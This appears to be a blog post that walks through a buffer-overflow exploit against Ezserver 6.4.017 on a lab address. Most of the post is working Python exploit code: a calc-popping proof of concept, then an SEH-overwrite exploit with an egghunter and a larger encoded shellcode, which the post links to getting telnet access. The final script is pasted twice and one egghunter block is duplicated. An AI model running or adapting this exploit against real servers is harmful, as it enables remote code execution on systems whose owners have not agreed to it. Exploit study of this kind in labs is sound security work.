Let's continue the job ( observate Ezserver 6.4.017 ) :
Tomorrow i try until load payload but aplication crash and telnet doesn't work. Why? cek the dump of memory but change the fuzzer with generatedcode 01-FF use generatedcode.pl ==> standart bad character 00 0a 0d :
==> Running the fuzzer and follow dump with ollydbg
**See, the code not complete just 01-F4, so i need more space for payload.
**Use calc shellcode to verify fuzzer can use (only use about 160 bit space).
**Use egghunter to handle the problem.
==> Calc shellcode==> Windows executable command
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buff="\x90"*5879
buff+= "\xeb\x06\x90\x90"
buff+= "\x96\x96\x20\x10"
#buff+="\x90"*16
buff+=("\xba\xc9\x72\x97\x98\xda\xd8\x2b\xc9\xd9\x74\x24\xf4\x5b\xb1\x23"
"\x83\xc3\x04\x31\x53\x0e\x03\x9a\x7c\x75\x6d\xe0\x69\x3d\x8e\x18"
"\x6a\x35\xcb\x24\xe1\x35\xd1\x2c\xf4\x2a\x52\x83\xee\x3f\x3a\x3b"
"\x0e\xab\x8c\xb0\x24\xa0\x0e\x28\x75\x76\x89\x18\xf2\xb6\xde\x67"
"\x3a\xfc\x12\x66\x7e\xea\xd9\x53\x2a\xc9\x25\xd6\x37\x9a\x79\x3c"
"\xb9\x76\xe3\xb7\xb5\xc3\x67\x98\xd9\xd2\x9c\xad\xfe\x5f\x63\x5a"
"\x77\x03\x40\x98\x4b\x8d\x48\xc4\xc0\xae\x78\x81\x17\x56\x75\x02"
"\xd7\xab\x0e\x64\xc4\x1e\x9b\xec\xfc\x8b\x95\x67\x7c\xfb\xa6\x77"
"\x7d\x77\xce\x4b\x22\xb6\xf9\xd3\x8a\x31\xfd\x90\xf3\x39\xae\xfe"
"\x8d\x65\xac\x8d\x19\x0e\xcf\xfb\xd4\x79\xcf\x1c\x8b\xe4\x43\x81"
"\x4c")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
print"Junk sent........"
payload = ("GET /"+buff+"\r\n\r\n"+"HTTP/1.1")
sock.send (payload)
sock.close()
==> Use calc fuzzer .
** Cacl execute and running in window
==> Scenario to create fuzzer:
*** (nops+"w00tw00t"+shellcode+nops)+jump short+dll address+egghunter
long bit is same to overwrited EIP
egghunter: ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") # 32bit
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") # 32bit
egghunter will be find the tag "w00tw00t" and execute shellcode.
==> Create fuzzer with scenario above.
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
hunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
shellcode=("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")
buff="\x90"*5495
buff+="w00tw00t"
buff+=shellcode
buff+="\x90"*32
buff+= "\xeb\x06\x90\x90"
buff+= "\x96\x96\x20\x10"
buff+="\x90"*16
buff+= hunt
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
print"Junk sent........"
payload = ("GET /"+buff+"\r\n\r\n"+"HTTP/1.1")
sock.send (payload)
sock.close()
import socket
target_address="192.168.56.101"
target_port=8000
hunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
shellcode=("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")
buff="\x90"*5495
buff+="w00tw00t"
buff+=shellcode
buff+="\x90"*32
buff+= "\xeb\x06\x90\x90"
buff+= "\x96\x96\x20\x10"
buff+="\x90"*16
buff+= hunt
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
print"Junk sent........"
payload = ("GET /"+buff+"\r\n\r\n"+"HTTP/1.1")
sock.send (payload)
sock.close()
==> Running fuzzer and see the result.
===================================================================================
===================================================================================
===================================================================================
No comments:
Post a Comment